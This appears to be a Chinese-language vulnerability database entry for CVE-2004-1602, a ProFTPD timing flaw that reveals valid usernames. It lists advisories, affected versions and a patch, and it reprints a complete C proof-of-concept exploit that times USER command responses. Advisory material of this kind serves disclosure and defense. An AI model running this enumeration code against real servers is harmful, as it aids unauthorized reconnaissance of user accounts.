CVE-2004-1602
CVSS5.0
发布时间 :2004-10-15 00:00:00
修订时间 :2016-10-17 22:57:25
NMCOE    

[原文]ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.


[CNNVD]ProFTPd登录时间差异用户帐户泄露漏洞(CNNVD-200410-018)

        
        ProFTPd是一款流行的FTP服务程序。
        ProFTPd在处理'USER'命令时对非法用户名处理存在时间差异,远程攻击者可以利用这个漏洞验证合法用户帐户名。
        LSS Security Team报告通过对ProFTPd登录过程进行代码执行路径时间分析,可判断合法用户帐户名。远程用户估量传输'USER'命令和应答时间的差异,可判断帐户是否合法。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:proftpd_project:proftpd:1.2.9
cpe:/a:proftpd_project:proftpd:1.2.0_rc3
cpe:/a:proftpd_project:proftpd:1.2_pre3
cpe:/a:proftpd_project:proftpd:1.2_pre4
cpe:/a:proftpd_project:proftpd:1.2
cpe:/a:proftpd_project:proftpd:1.2_pre11
cpe:/a:proftpd_project:proftpd:1.2_pre10
cpe:/a:proftpd_project:proftpd:1.2_pre5
cpe:/a:proftpd_project:proftpd:1.2_pre6
cpe:/a:proftpd_project:proftpd:1.2_pre7
cpe:/a:proftpd_project:proftpd:1.2_pre8
cpe:/a:proftpd_project:proftpd:1.2_pre1
cpe:/a:proftpd_project:proftpd:1.2.5_rc1
cpe:/a:proftpd_project:proftpd:1.2_pre2
cpe:/a:proftpd_project:proftpd:1.2.0_rc2
cpe:/a:proftpd_project:proftpd:1.2.0_rc1
cpe:/a:proftpd_project:proftpd:1.2.7_rc2
cpe:/a:proftpd_project:proftpd:1.2.7_rc3
cpe:/a:proftpd_project:proftpd:1.2.8_rc1
cpe:/a:proftpd_project:proftpd:1.2.2_rc3
cpe:/a:proftpd_project:proftpd:1.2.8_rc2
cpe:/a:proftpd_project:proftpd:1.2.1
cpe:/a:proftpd_project:proftpd:1.2.2
cpe:/a:proftpd_project:proftpd:1.2.7
cpe:/a:proftpd_project:proftpd:1.2.8
cpe:/a:proftpd_project:proftpd:1.2.5
cpe:/a:proftpd_project:proftpd:1.2.6
cpe:/a:proftpd_project:proftpd:1.2.9_rc1
cpe:/a:proftpd_project:proftpd:1.2.7_rc1
cpe:/a:proftpd_project:proftpd:1.2.3
cpe:/a:proftpd_project:proftpd:1.2.4
cpe:/a:proftpd_project:proftpd:1.2.9_rc2
cpe:/a:proftpd_project:proftpd:1.2.9_rc3
cpe:/a:proftpd_project:proftpd:1.2_pre9
cpe:/a:proftpd_project:proftpd:1.2.2_rc1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1602
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-018
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109786760926133&w=2
(UNKNOWN)  BUGTRAQ  20041015 ProFTPD 1.2.x remote users enumeration bug
http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
(VENDOR_ADVISORY)  MISC  http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
http://securitytracker.com/id?1011687
(VENDOR_ADVISORY)  SECTRACK  1011687
http://www.securityfocus.com/bid/11430
(VENDOR_ADVISORY)  BID  11430
http://xforce.iss.net/xforce/xfdb/17724
(VENDOR_ADVISORY)  XF  proftpd-info-disclosure(17724)

- 漏洞信息

ProFTPd登录时间差异用户帐户泄露漏洞
中危 设计错误
2004-10-15 00:00:00 2005-10-20 00:00:00
远程  
        
        ProFTPd是一款流行的FTP服务程序。
        ProFTPd在处理'USER'命令时对非法用户名处理存在时间差异,远程攻击者可以利用这个漏洞验证合法用户帐户名。
        LSS Security Team报告通过对ProFTPd登录过程进行代码执行路径时间分析,可判断合法用户帐户名。远程用户估量传输'USER'命令和应答时间的差异,可判断帐户是否合法。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * LSS Security Team提供了如下第三方补丁:
        proftpd-1.2.10/modules/mod_auth.c
        1867a 1868,1877
        > {
        > unsigned int randa;
        > struct timeval tv;
        > struct timezone tz;
        > gettimeofday (&tv, &tz);
        > srand(tv.tv_usec);
        > randa = rand() % 20000;
        > usleep(randa);
        > }
        >
        厂商补丁:
        ProFTPD Project
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.proftpd.org/

- 漏洞信息 (581)

ProFTPD <= 1.2.10 Remote Users Enumeration Exploit (EDBID:581)
linux remote
2004-10-17 Verified
0 Leon Juranic
N/A [点击下载]
/* 
Details 
Vulnerable Systems:
* ProFTPD Version 1.2.10 and below

It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There is a very small (but significant) difference in time delay of code execution path between valid and non-valid user names. That can be used to remotely determine the difference between existent and non-existent users. The time delay can be measured by using a simple FTP client that will calculate elapsed time between 'USER' command sent by client, and the server response. Because of the very short response period, elapsed time should be measured in microseconds.

Proof of Concept Code:
LSS has developed simple PoC exploit that is presented here:

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic // http://www.lss.hr
*/

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
int sock,n,y;
long dist,stat=0;
struct sockaddr_in sin;
char buf[1024], buf2[1024];
struct timeval tv, tv2;
struct timezone tz, tz2;

printf ("Proftpd remote users discovery exploit\n"
" Coded by Leon / LSS Security\n"
">-------------------------------------<\n");

if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }

sock = socket (AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons (PORT);
sin.sin_addr.s_addr = inet_addr (argv[1]);
bzero (sin.sin_zero,8);

connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

printf ("Login time: ");
n = read (sock,buf2, sizeof(buf2));
for (y=0;y<PROBE;y++) {
gettimeofday (&tv,&tz);
snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
write (sock, buf, strlen(buf));
n = read (sock,buf2, sizeof(buf2));
gettimeofday (&tv2,&tz2);
dist =tv2.tv_usec - tv.tv_usec;
stat += dist;
printf (" %d |",dist);
}
printf ("\nAvrg: %d\n",(stat/PROBE));
close (sock);
}

// milw0rm.com [2004-10-17]
		

- 漏洞信息

10758
ProFTPD Login Timing Account Name Enumeration
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

ProFTPD contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker measures the elapsed time between the sending of the 'USER' command to the server and the servers response, which will disclose which user accounts are valid resulting in a loss of confidentiality.

- 时间线

2004-10-15 Unknow
2004-10-15 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站